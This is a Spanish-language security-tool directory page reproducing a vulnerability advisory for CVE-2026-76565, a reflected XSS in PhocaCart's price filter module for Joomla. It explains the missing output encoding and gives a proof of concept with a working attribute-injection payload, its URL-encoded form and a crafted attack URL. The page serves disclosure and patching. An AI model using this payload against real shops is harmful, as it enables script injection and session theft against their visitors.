Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-76565 — XSS Reflejado a través de los parámetros de filtro price_from y price_to en PhocaCart | Kitploit
Herramientas/GitHubGitHub/toanln-cov/cve-2026-76565
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPapers e Investigación
GitHubtoanln-cov/cve-2026-76565

CVE-2026-76565

XSS Reflejado a través de los parámetros de filtro price_from y price_to en PhocaCart

Ver Repositorio
hace 3 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

XSS Reflejado a través de los parámetros de filtro price_from / price_to en PhocaCart

PhocaCart ≤ 6.1.7 — Un atacante no autenticado inyecta JavaScript arbitrario a través de una URL de filtro de precio manipulada

CVE CVSS v4.0 CWE-79 Affected Researcher


RESUMEN

PhocaCart 6.1.7 para Joomla es vulnerable a Cross-Site Scripting Reflejado (XSS) a través de los parámetros GET price_from y price_to cuando el módulo mod_phocacart_filter está instalado y publicado. Los parámetros se procesan con el filtro de entrada 'string' de Joomla, que aplica únicamente strip_tags() — no aplica . Los valores sin procesar se vuelcan directamente en atributos HTML del formulario de filtro de precio generado por el módulo .

Descargar herramienta
htmlspecialchars()
value=""
mod_phocacart_filter

Un atacante entrega una URL manipulada a una víctima. Cuando la víctima carga la página, el manejador de eventos inyectado se ejecuta en su navegador. No se requiere autenticación. El ataque requiere que mod_phocacart_filter (un módulo distribuido por separado) esté instalado y publicado.


VERSIONES AFECTADAS

COMPONENTEVULNERABLEPROBADO ENCORREGIDO
PhocaCart (com_phocacart) + mod_phocacart_filter≤ 6.1.7Joomla 5.4.7 + PhocaCart 6.1.7 + mod_phocacart_filter 6.1.66.1.8

DETALLES DE LA VULNERABILIDAD

Tipo: XSS Reflejado (CWE-79) Autenticación requerida: Ninguna — frontend público de la tienda Token CSRF requerido: No (petición GET) Archivo sumidero: site/layouts/form_filter_horizontal_text.php:65,71

Causa raíz

El filtro de entrada 'string' de Joomla llama a strip_tags() — elimina las etiquetas HTML pero deja sin codificar caracteres especiales HTML como \", ' y >. Los parámetros GET price_from y price_to se obtienen con este filtro y se almacenan en $data['getparams']. Los archivos de plantilla vuelcan estos valores directamente en atributos value="" sin llamar a htmlspecialchars(), lo que permite la inyección en el contexto de atributo.

Flujo de datos — de la fuente al sumidero:

root@kitploit:~
GET ?price_from=" onmouseover="alert(document.domain)

  filter.php:831    $app->getInput()->get('price_from', '', 'string')
  └─ Joomla 'string' filter = strip_tags() only
     strip_tags('" onmouseover="alert(1)') → '" onmouseover="alert(1)'  [unchanged!]

  filter.php:494    $inA[] = $v  // no encoding
  └─ $data['getparams'] = ['" onmouseover="alert(document.domain)']

  form_filter_horizontal_text.php:65:
  └─ <input type="text" value="<?php echo $d['getparams'][0]; ?>" /> // → NO htmlspecialchars()
  → Renders: value="" onmouseover="alert(document.domain)"
  → XSS fires on mouseover

FORM_FILTER_HORIZONTAL_TEXT.PHP:65 — SUMIDERO VULNERABLE

root@kitploit:~
<input type="text" class="form-control" name="pricefrom"
  value="<?php echo $d['getparams'][0]; ?>"   <!-- NO htmlspecialchars() -->
  id="phPriceFrom..." />

El mismo patrón de sumidero también existe en form_filter_text.php:81,87 (variante de diseño vertical). Tanto price_from como price_to son igualmente vulnerables.


PRUEBA DE CONCEPTO

1. Elaborar la URL maliciosa

El atacante construye una URL dirigida a la vista de artículos de la tienda con un payload de manejador de eventos inyectado en el parámetro price_from. El payload sale del contexto del atributo value="".

root@kitploit:~
Payload (raw):     " autofocus onfocus="alert(document.domain)
URL-encoded:       %22%20autofocus%20onfocus%3D%22alert(document.domain)

Crafted URL:
http://TARGET/index.php?option=com_phocacart&view=items
  &price_from=%22%20autofocus%20onfocus%3D%22alert(document.domain)

2. La víctima carga la página — el XSS se ejecuta al cargar la página

Cuando la víctima abre la URL manipulada, la página de artículos de la tienda genera el formulario de filtro de precio. Los atributos inyectados están presentes en el elemento <input>. Con el payload autofocus onfocus, JavaScript se ejecuta inmediatamente al cargar la página sin necesidad de interacción adicional del usuario.

HTML generado (vulnerable):

root@kitploit:~
<input type="text" class="form-control" name="pricefrom"
  value="" autofocus onfocus="alert(document.domain)"
  id="phPriceFromTopricefrom" />

Diálogo de alerta XSS ejecutándose en el navegador de la víctima — alert(document.domain) confirma la ejecución en el frontend de la tienda

El XSS se ejecuta en el navegador de la víctima — alert(document.domain) confirma el contexto de ejecución en el frontend de la tienda


IMPACTO

  1. Robo de cookies de sesión — Un payload armado puede exfiltrar la cookie de sesión de la víctima a un servidor controlado por el atacante, permitiendo la toma de control de la cuenta.
  2. Phishing / Recolección de credenciales — El payload puede redirigir a la víctima a una página de inicio de sesión falsa alojada en el dominio del atacante, capturando credenciales bajo el nombre de dominio de confianza de la tienda.
  3. Distribución de malware — El origen de confianza de la tienda puede ser abusado para entregar descargas automáticas (drive-by downloads) o kits de explotación a víctimas que hagan clic en enlaces manipulados por el atacante.

REFERENCIAS

  • CVE: https://www.cve.org/CVERecord?id=CVE-2026-76565
  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-76565
  • Aviso de GitHub: https://github.com/advisories/GHSA-2m94-2f44-8q5p
  • Repositorio del proveedor: https://github.com/PhocaDesign/PhocaCart